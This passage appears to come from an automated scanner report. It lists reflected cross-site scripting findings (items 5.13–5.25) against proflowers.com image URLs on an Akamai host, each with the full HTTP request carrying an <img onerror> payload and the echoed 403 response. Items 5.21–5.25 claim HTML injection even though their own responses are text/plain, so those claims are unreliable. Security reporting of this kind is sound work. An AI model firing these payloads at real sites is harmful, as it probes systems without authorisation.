GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:17 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img src=a onerror=alert(1)>4af1509f708

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload dde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13 was submitted in REST URL parameter 9 and was echoed as dde05<img src=a onerror=alert(1)>7b7dbc8df13 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:00 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img src=a onerror=alert(1)>7b7dbc8df13

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload b5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe was submitted in REST URL parameter 9 and was echoed as b5852<img src=a onerror=alert(1)>e0c47f2adfe in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:38 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img src=a onerror=alert(1)>e0c47f2adfe

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516 was submitted in REST URL parameter 9 and was echoed as 5dc38<img src=a onerror=alert(1)>73585b63516 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img src=a onerror=alert(1)>73585b63516

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af was submitted in REST URL parameter 9 and was echoed as fd9b1<img src=a onerror=alert(1)>c9ece6814af in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img src=a onerror=alert(1)>c9ece6814af

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload bf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f was submitted in REST URL parameter 9 and was echoed as bf8d3<img src=a onerror=alert(1)>4c20501340f in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img src=a onerror=alert(1)>4c20501340f

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload dc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3 was submitted in REST URL parameter 9 and was echoed as dc8f1<img src=a onerror=alert(1)>351d0d588f3 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:46 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img src=a onerror=alert(1)>351d0d588f3

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload d3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb was submitted in REST URL parameter 9 and was echoed as d3241<img src=a onerror=alert(1)>b814b4c37bb in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:55 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img src=a onerror=alert(1)>b814b4c37bb

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171 was submitted in REST URL parameter 9 and was echoed as 6af88<img src=a onerror=alert(1)>3334b396171 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img src=a onerror=alert(1)>3334b396171

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a was submitted in the REST URL parameter 9. This input was echoed as 908f9<img src=a onerror=alert(1)>5ff4f03be4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:57 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img src=a onerror=alert(1)>5ff4f03be4a

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e was submitted in the REST URL parameter 9. This input was echoed as 5b198<img src=a onerror=alert(1)>c4c8409ea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:27 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img src=a onerror=alert(1)>c4c8409ea3e

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049 was submitted in the REST URL parameter 9. This input was echoed as 231ab<img src=a onerror=alert(1)>e6d8d6db049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:58 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img src=a onerror=alert(1)>e6d8d6db049

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2 was submitted in the REST URL parameter 9. This input was echoed as e2157<img src=a onerror=alert(1)>5531a670ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:54 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img src=a onerror=alert(1)>5531a670ae2

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430 was submitted in the REST URL parameter 9. This input was echoed as 4b059<img src=a onerror=alert(1)>6709cddd430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:43 GMT
Connection: close

